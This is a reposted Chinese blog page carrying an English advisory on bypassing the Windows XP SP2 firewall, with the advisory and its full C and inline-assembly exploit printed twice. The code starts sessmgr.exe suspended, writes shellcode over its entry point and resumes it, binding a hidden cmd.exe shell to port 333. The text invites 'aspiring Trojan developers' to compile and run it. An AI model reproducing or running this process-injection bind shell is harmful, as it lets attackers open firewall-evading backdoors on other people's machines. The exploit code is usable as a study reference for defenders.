[转贴]绕过xp sp2防火墙的代码
2004-10-26 20:17
633 查看
绕过xp sp2防火墙的代码
Summary
Windows XP Service Pack 2 incorporates many enhancements to try to better protect systems from malware and other forms of attacks. One of those layers of protection is the Windows XP SP2 Firewall. One of the features of this Firewall is the ability to allow users to decide what applications can listen on the network. By allowing users to control what applications can communicate on the network, Microsoft believes that systems will be protected against threats such as Trojans. Like so many things Microsoft says, this is inaccurate and in fact it is very easy for locally executing code to bypass the Windows Firewall. So don't worry you aspiring Trojan developers, your still going to be able to Trojan consumer and corporate systems to your hearts content.
Attached to this advisory is proof of concept code that demonstrates how a Trojan could bind to a port and accept connections by piggybacking on the inherent trust of sessmgr.exe. Simply compile this program and run it as any local user. To test if the Firewall has been bypassed (it is!) telnet from another machine to the target machine on port 333 and if your connected, then you've successfully bypassed the Windows XP Service Pack 2 Firewall.
Details
Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>
void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer[i]=='/xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}
int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");
__asm
{
call over
push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax
xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax
push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax
push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax
push SOMAXCONN
push esi
mov eax,0x66666666
call eax
push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax
push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp
push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax
push INFINITE
mov eax,0x88888888
call eax
over:
pop eax
mov code,eax
}
len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);
return len;
}
void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];
GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"//sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);
if (!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);
context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;
len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);
ResumeThread(pinfo.hThread);
}
Summary
Windows XP Service Pack 2 incorporates many enhancements to try to better protect systems from malware and other forms of attacks. One of those layers of protection is the Windows XP SP2 Firewall. One of the features of this Firewall is the ability to allow users to decide what applications can listen on the network. By allowing users to control what applications can communicate on the network, Microsoft believes that systems will be protected against threats such as Trojans. Like so many things Microsoft says, this is inaccurate and in fact it is very easy for locally executing code to bypass the Windows Firewall. So don't worry you aspiring Trojan developers, your still going to be able to Trojan consumer and corporate systems to your hearts content.
Attached to this advisory is proof of concept code that demonstrates how a Trojan could bind to a port and accept connections by piggybacking on the inherent trust of sessmgr.exe. Simply compile this program and run it as any local user. To test if the Firewall has been bypassed (it is!) telnet from another machine to the target machine on port 333 and if your connected, then you've successfully bypassed the Windows XP Service Pack 2 Firewall.
Details
Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>
void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer[i]=='/xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}
int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");
__asm
{
call over
push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax
xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax
push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax
push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax
push SOMAXCONN
push esi
mov eax,0x66666666
call eax
push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax
push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp
push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax
push INFINITE
mov eax,0x88888888
call eax
over:
pop eax
mov code,eax
}
len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);
return len;
}
void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];
GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"//sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);
if (!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);
context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;
len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);
ResumeThread(pinfo.hThread);
}
相关文章推荐
- 绕过xp sp2防火墙的代码
- 绕过XP SP2防火墙的代码
- 修正版!强制弹出窗口代码(xp sp2无法拦截)
- 学习Polymorphours的绕过防火墙的反向连接报警代码
- XP SP2防火墙设置详细讲解
- 学习Polymorphours的绕过防火墙的反向连接报警代码,心得,它的思路
- 黑客公布XP攻击代码能关闭自带防火墙
- 去除XP SP2对raw socket的一些限制
- 在Windows 2000/XP下开发防火墙
- webService用axis1.x绕过https证书校验的代码
- 转:开发基于Windows2000/XP的防火墙
- 破解XP登录密码,用U盘绕过登录密码进入Windows XP系统
- 【转贴分享】XP 中重新安装或修复IE6的三种方法
- xp要去掉默认的防火墙,才支持作为snmp代理被NMS网管
- Webshell是如何绕过防火墙提升权限的
- 登陆超时,请检查您的网络或者本机防火墙设置。 (错误代码:0×00000001)
- 转贴MYSQL出错代码列表
- [代码审计]云优cms V 1.1.2前台多处sql注入,任意文件删除修复绕过至getshell
- 解决XP越用越慢的问题[转贴]
- Windows 2000, XP SP2 和 Vista 将结束官方技术支持